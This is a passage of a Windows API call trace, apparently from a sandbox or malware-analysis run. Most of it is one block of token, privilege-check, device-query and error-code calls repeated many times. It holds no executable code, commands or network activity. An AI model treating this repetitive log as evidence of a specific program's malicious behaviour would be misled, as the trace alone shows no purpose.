TokenHandle=0x18fe80*=0x114) returned 1 [0016.962] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.962] SetLastError (dwErrCode=0x522) [0016.962] CloseHandle (hObject=0x114) returned 1 [0016.962] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.962] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.962] GetLastError () returned 0x578 [0016.962] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.962] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.962] GetCurrentThread () returned 0xfffffffe [0016.962] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.962] GetLastError () returned 0x3f0 [0016.962] GetCurrentProcess () returned 0xffffffff [0016.962] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.962] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.962] SetLastError (dwErrCode=0x522) [0016.962] CloseHandle (hObject=0x114) returned 1 [0016.962] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.962] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.962] GetLastError () returned 0x578 [0016.962] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.962] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.962] GetCurrentThread () returned 0xfffffffe [0016.962] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.962] GetLastError () returned 0x3f0 [0016.962] GetCurrentProcess () returned 0xffffffff [0016.962] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.962] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.962] SetLastError (dwErrCode=0x522) [0016.962] CloseHandle (hObject=0x114) returned 1 [0016.963] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.963] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.963] GetLastError () returned 0x578 [0016.963] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.963] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.963] GetCurrentThread () returned 0xfffffffe [0016.963] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.963] GetLastError () returned 0x3f0 [0016.963] GetCurrentProcess () returned 0xffffffff [0016.963] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.963] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.963] SetLastError (dwErrCode=0x522) [0016.963] CloseHandle (hObject=0x114) returned 1 [0016.963] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.963] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.963] GetLastError () returned 0x578 [0016.963] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.963] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.963] GetCurrentThread () returned 0xfffffffe [0016.963] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.963] GetLastError () returned 0x3f0 [0016.963] GetCurrentProcess () returned 0xffffffff [0016.963] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.963] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.963] SetLastError (dwErrCode=0x522) [0016.963] CloseHandle (hObject=0x114) returned 1 [0016.963] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.963] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.963] GetLastError () returned 0x578 [0016.963] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.963] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.963] GetCurrentThread () returned 0xfffffffe [0016.963] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.963] GetLastError () returned 0x3f0 [0016.963] GetCurrentProcess () returned 0xffffffff [0016.963] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.963] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.963] SetLastError (dwErrCode=0x522) [0016.963] CloseHandle (hObject=0x114) returned 1 [0016.963] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.963] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.963] GetLastError () returned 0x578 [0016.964] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.964] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.964] GetCurrentThread () returned 0xfffffffe [0016.964] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.964] GetLastError () returned 0x3f0 [0016.964] GetCurrentProcess () returned 0xffffffff [0016.964] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.964] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.964] SetLastError (dwErrCode=0x522) [0016.964] CloseHandle (hObject=0x114) returned 1 [0016.964] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.964] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.964] GetLastError () returned 0x578 [0016.964] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.964] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.964] GetCurrentThread () returned 0xfffffffe [0016.964] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.964] GetLastError () returned 0x3f0 [0016.964] GetCurrentProcess () returned 0xffffffff [0016.964] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.964] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.964] SetLastError (dwErrCode=0x522) [0016.964] CloseHandle (hObject=0x114) returned 1 [0016.964] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.964] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.964] GetLastError () returned 0x578 [0016.964] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.964] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.964] GetCurrentThread () returned 0xfffffffe [0016.964] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.964] GetLastError () returned 0x3f0 [0016.964] GetCurrentProcess () returned 0xffffffff [0016.964] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.964] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.964] SetLastError (dwErrCode=0x522) [0016.964] CloseHandle (hObject=0x114) returned 1 [0016.964] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.964] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.964] GetLastError () returned 0x578 [0016.964] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.964] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.964] GetCurrentThread () returned 0xfffffffe [0016.964] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.965] GetLastError () returned 0x3f0 [0016.965] GetCurrentProcess () returned 0xffffffff [0016.965] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.965] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.965] SetLastError (dwErrCode=0x522) [0016.965] CloseHandle (hObject=0x114) returned 1 [0016.965] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.965] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.965] GetLastError () returned 0x578 [0016.965] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.965] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.965] GetCurrentThread () returned 0xfffffffe [0016.965] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.965] GetLastError () returned 0x3f0 [0016.965] GetCurrentProcess () returned 0xffffffff [0016.965] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.965] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.965] SetLastError (dwErrCode=0x522) [0016.965] CloseHandle (hObject=0x114) returned 1 [0016.965] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.965] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.965] GetLastError () returned 0x578 [0016.965] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.965] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.965] GetCurrentThread () returned 0xfffffffe [0016.965] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.965] GetLastError () returned 0x3f0 [0016.965] GetCurrentProcess () returned 0xffffffff [0016.965] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.965] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.965] SetLastError (dwErrCode=0x522) [0016.965] CloseHandle (hObject=0x114) returned 1 [0016.965] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.965] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.965] GetLastError () returned 0x578 [0016.965] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.965] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.965] GetCurrentThread () returned 0xfffffffe [0016.965] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.965] GetLastError () returned 0x3f0 [0016.965] GetCurrentProcess () returned 0xffffffff [0016.965] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.965] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.966] SetLastError (dwErrCode=0x522) [0016.966] CloseHandle (hObject=0x114) returned 1 [0016.966] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.966] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.966] GetLastError () returned 0x578 [0016.966] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.966] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.966] GetCurrentThread () returned 0xfffffffe [0016.966] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.966] GetLastError () returned 0x3f0 [0016.966] GetCurrentProcess () returned 0xffffffff [0016.966] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.966] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.966] SetLastError (dwErrCode=0x522) [0016.966] CloseHandle (hObject=0x114) returned 1 [0016.966] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.966] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.966] GetLastError () returned 0x578 [0016.966] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.966] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.966] GetCurrentThread () returned 0xfffffffe [0016.966] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.966] GetLastError () returned 0x3f0 [0016.966] GetCurrentProcess () returned 0xffffffff [0016.966] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.966] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.966] SetLastError (dwErrCode=0x522) [0016.966] CloseHandle (hObject=0x114) returned 1 [0016.966] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.966] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.966] GetLastError () returned 0x578 [0016.966] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.966] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.966] GetCurrentThread () returned 0xfffffffe [0016.966] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.966] GetLastError () returned 0x3f0 [0016.966] GetCurrentProcess () returned 0xffffffff [0016.966] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.966] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.966] SetLastError (dwErrCode=0x522) [0016.966] CloseHandle (hObject=0x114) returned 1 [0016.966] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.967] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.967] GetLastError () returned 0x578 [0016.967] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.967] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.967] GetCurrentThread () returned 0xfffffffe [0016.967] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.967] GetLastError () returned 0x3f0 [0016.967] GetCurrentProcess () returned 0xffffffff [0016.967] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.967] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.967] SetLastError (dwErrCode=0x522) [0016.967] CloseHandle (hObject=0x114) returned 1 [0016.967] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.967] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.967] GetLastError () returned 0x578 [0016.967] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.967] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.967] GetCurrentThread () returned 0xfffffffe [0016.967] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.967] GetLastError () returned 0x3f0 [0016.967] GetCurrentProcess () returned 0xffffffff [0016.967] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.967] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.967] SetLastError (dwErrCode=0x522) [0016.967] CloseHandle (hObject=0x114) returned 1 [0016.967] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.967] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.967] GetLastError () returned 0x578 [0016.967] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.967] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.967] GetCurrentThread () returned 0xfffffffe [0016.967] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.967] GetLastError () returned 0x3f0 [0016.967] GetCurrentProcess () returned 0xffffffff [0016.967] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.967] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.967] SetLastError (dwErrCode=0x522) [0016.967] CloseHandle (hObject=0x114) returned 1 [0016.967] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.967] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.967] GetLastError () returned 0x578 [0016.967] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.967] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.968] GetCurrentThread () returned 0xfffffffe [0016.968] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.968] GetLastError () returned 0x3f0 [0016.968] GetCurrentProcess () returned 0xffffffff [0016.968] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.968] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.968] SetLastError (dwErrCode=0x522) [0016.968] CloseHandle (hObject=0x114) returned 1 [0016.968] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.968] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.968] GetLastError () returned 0x578 [0016.968] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.968] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.968] GetCurrentThread () returned 0xfffffffe [0016.968] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.968] GetLastError () returned 0x3f0 [0016.968] GetCurrentProcess () returned 0xffffffff [0016.968] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.968] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.968] SetLastError (dwErrCode=0x522) [0016.968] CloseHandle (hObject=0x114) returned 1 [0016.968] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.968] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.968] GetLastError () returned 0x578 [0016.968] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.968] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.968] GetCurrentThread () returned 0xfffffffe [0016.968] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.968] GetLastError () returned 0x3f0 [0016.968] GetCurrentProcess () returned 0xffffffff [0016.968] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.968] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.968] SetLastError (dwErrCode=0x522) [0016.968] CloseHandle (hObject=0x114) returned 1 [0016.968] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.968] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.968] GetLastError () returned 0x578 [0016.968] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.968] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.968] GetCurrentThread () returned 0xfffffffe [0016.968] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.968] GetLastError () returned 0x3f0 [0016.968] GetCurrentProcess () returned 0xffffffff [0016.968] OpenProcessToken (in: ProcessHandle=0xffffffff, 